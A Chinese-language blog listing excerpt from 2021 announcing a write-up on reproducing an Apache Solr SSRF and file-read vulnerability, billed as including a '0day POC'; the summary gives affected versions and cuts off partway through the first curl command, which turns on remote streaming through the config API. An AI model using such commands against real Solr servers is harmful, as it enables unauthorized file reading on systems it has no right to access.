2021年7月4日
【漏洞复现系列】Apache Solr SSRF文件读取漏洞(附0day POC)
摘要: 漏洞详情 Apache Solr <= 8.8.1均受影响,通杀所有版本,官方拒绝修复 通过Solr提供的API可以开启远程开启文件流读取: curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStre 阅读全文
posted @ 2021-07-04 21:24 ABKing 阅读(441) 评论(0) 推荐(0) 编辑